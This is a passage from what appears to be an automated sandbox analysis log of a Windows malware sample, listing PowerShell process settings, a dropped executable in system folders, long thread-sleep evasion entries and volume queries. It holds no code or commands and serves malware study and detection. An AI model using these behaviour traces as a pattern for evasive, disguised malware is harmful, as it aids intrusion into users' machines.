Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 2284 |
Thread sleep time: -922337203685477s >= -30000s |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 4676 |
Thread sleep time: -922337203685477s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000 |
Thread sleep count: 3024 > 30 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9092 |
Thread sleep time: -14757395258967632s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872 |
Thread sleep time: -1844674407370954s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960 |
Thread sleep count: 1235 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8880 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140 |
Thread sleep count: 1180 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8832 |
Thread sleep time: -1844674407370954s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 |
Thread sleep count: 1788 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 612 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 |
Thread sleep count: 1427 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9176 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8920 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176 |
Thread sleep count: 1264 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028 |
Thread sleep time: -1844674407370954s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8896 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756 |
Thread sleep count: 1139 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8936 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252 |
Thread sleep count: 1199 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9180 |
Thread sleep time: -9223372036854770s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204 |
Thread sleep count: 1151 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364 |
Thread sleep count: 1401 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9160 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536 |
Thread sleep count: 1304 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9172 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464 |
Thread sleep count: 1344 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188 |
Thread sleep time: -13835058055282155s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460 |
Thread sleep count: 1360 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9168 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8684 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8560 |
Thread sleep count: 1173 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8552 |
Thread sleep count: 2252 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9100 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8904 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360 |
Thread sleep count: 1607 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9116 |
Thread sleep time: -1844674407370954s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512 |
Thread sleep count: 1365 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400 |
Thread sleep count: 1378 > 30 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696 |
Thread sleep time: -1844674407370954s >= -30000s |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 9148 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 7748 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 5656 |
Thread sleep time: -30000s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -33204139332677172s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -600000s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -599843s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -599625s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -598718s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -598524s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -598234s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -598077s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 8412 |
Thread sleep time: -18000000s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -597718s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -597541s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -597404s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -597275s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -597153s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -597046s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -596933s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -596813s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -596557s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -596015s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -595825s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -595640s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -595468s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -595265s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -595120s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -594988s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -594859s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -594723s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -594598s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148 |
Thread sleep time: -594468s >= -30000s |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8668 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8704 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\System32\svchost.exe TID: 4816 |
Thread sleep time: -30000s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6784 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8952 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 4404 |
Thread sleep time: -922337203685477s >= -30000s |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Queries volume information: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
